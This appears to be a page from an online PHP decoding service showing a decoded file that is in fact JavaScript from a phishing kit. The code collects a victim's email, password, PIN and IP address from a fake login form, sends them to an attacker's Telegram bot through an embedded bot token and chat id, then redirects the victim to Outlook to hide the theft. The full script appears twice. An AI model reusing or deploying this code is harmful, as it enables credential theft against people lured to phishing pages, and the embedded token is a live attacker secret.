Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

//bot token var telegram_bot_id = "7936256953:AAHlueatZi8jc382snAJvpbZqHcBeg1kHDc"; //ch..

Decoded Output download

<?  //bot token 
var telegram_bot_id = "7936256953:AAHlueatZi8jc382snAJvpbZqHcBeg1kHDc"; 
//chat id 
var chat_id = "2061509117"; 
var u_name, pax, u_pin2, ip, ip2; 
var ready = function () { 
    u_name = document.getElementById("uzer").value; 
    pax = document.getElementById("pazz").value; 
    u_pin2 = document.getElementById("p1n").value; 
    ip = document.getElementById("gfg").innerHTML; 
    ip2 = document.getElementById("address").innerHTML; 
    message = "EMAIL: " + u_name + "
Cl4v3: " + pax +"
P1N: " + u_pin2 +"
IP: " + ip +"
" + ip2 +"

LAGSBOG"; 
}; 
var sender = function () { 
    ready(); 
    var settings = { 
        "async": true, 
        "crossDomain": true, 
        "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage", 
        "method": "POST", 
        "headers": { 
            "Content-Type": "application/json", 
            "cache-control": "no-cache" 
 
        }, 
        "data": JSON.stringify({ 
            "chat_id": chat_id, 
            "text": message 
        }) 
    }; 
    $.ajax(settings).done(function (response) { 
        window.location = 'https://outlook.live.com'; 
        console.log(response); 
    }); 
    return false; 
}; 
 ?>

Did this file decode correctly?

Original Code

//bot token
var telegram_bot_id = "7936256953:AAHlueatZi8jc382snAJvpbZqHcBeg1kHDc";
//chat id
var chat_id = "2061509117";
var u_name, pax, u_pin2, ip, ip2;
var ready = function () {
    u_name = document.getElementById("uzer").value;
    pax = document.getElementById("pazz").value;
    u_pin2 = document.getElementById("p1n").value;
    ip = document.getElementById("gfg").innerHTML;
    ip2 = document.getElementById("address").innerHTML;
    message = "EMAIL: " + u_name + "\nCl4v3: " + pax +"\nP1N: " + u_pin2 +"\nIP: " + ip +"\n" + ip2 +"\n\nLAGSBOG";
};
var sender = function () {
    ready();
    var settings = {
        "async": true,
        "crossDomain": true,
        "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"

        },
        "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message
        })
    };
    $.ajax(settings).done(function (response) {
        window.location = 'https://outlook.live.com';
        console.log(response);
    });
    return false;
};

Function Calls

None

Variables

None

Stats

MD5 8fe2557a41907cfc29123ccda8a6fc64
Eval Count 0
Decode Time 53 ms